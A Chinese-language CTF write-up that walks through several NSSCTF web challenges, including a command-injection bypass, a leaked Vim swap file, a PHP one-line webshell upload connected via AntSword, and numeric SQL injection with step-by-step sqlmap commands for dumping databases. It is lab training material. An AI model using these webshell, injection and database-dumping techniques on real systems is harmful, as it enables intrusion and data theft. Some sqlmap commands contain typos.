1.我Flag呢?
打开页面没有任何有用信息,f12查看页面源代码发现flag
2.导弹迷踪
页面是一个游戏,提示通关第六关得到flag,通过js代码查找发现flag在src/game.js
题目描述:
探姬坚信PHP是世界上最好的语言,于是她用PHP写了一个小工具 (Flag位于根目录)
Flag形式 NSSCTF{}
出题人 探姬
题目提示了flag位于根目录,写php代码扫描根目录文件得到名为flag文件,直接打开即可得到flag的值
4.Ping
命令执行直接cat即可得到flag。由于前端做了过滤,使用hackbar传参即可绕过。
由于前端无法提交数据,根据提示用hackbar传参即可。
6.Vim yyds
题目描述:
漏...漏了!
Flag形式 NSSCTF{}
出题人 s1rius
由描述猜到源码泄露,扫目录得到swp文件,记事本打开得到回显flag的条件,结合cmd命令执行得到flag.
7.作业管理系统
查源码得到登录账号与密码,在创建文件处写一个一句话木马或者上传文件处传一个一句话木马,得到文件地址,再用蚁剑连接木马,在根目录发现flag。
查看文件发现显示php信息说明文件被php成功解析,木马上传成功,由写入代码得密码为a,用蚁剑链接即可.
8.这是什么?SQL !注一下 !
页面已经提示注入类型为数字型,基本步骤:
1.判断列数,查回显点
Order by 3 无回显,故有两列;select 1,2 ;发现回显在2位置,放入语句查询。
2.查库名,所有库名,表名,字段,最后查内容
本题flag位置为ctftraining(库).flag(表).flag(字段)
或者用sqlmap工具
本题为get型,代换命令行即可
1.POST型:
1.查询当前数据库名:python sqlma.py -u "URL" --data="id=1" --current-db
2.查询数据库下表名:python sqlma.py -u "URL" --data="id=1" -D 库名 --tables
3.查询某表下字段名:python sqlma.py -u "URL" --data="id=1" -D 库名 -T 表名 --columns
4.查询某字段下所有内容:python sqlma.py -u "URL" --data="id=1" -D 库名 -T 表名 -C 字段名 --dump
2.GET型:
1.爆库: python sqlmap -u "http://xxxxx/?id=1" --dbs
2.爆表 python sqlmap -u "url" -tables -D 库名
3.爆字段列 python sqlmap -u "url" -columns -T 表名 -D 库名
4.通过字段列,爆出所有表中的记录(爆内容) python sqlmap -u "url" --dump -C "字段名(多个字段可同时查询,字段名用逗号隔开)" -T 表名 -D 库名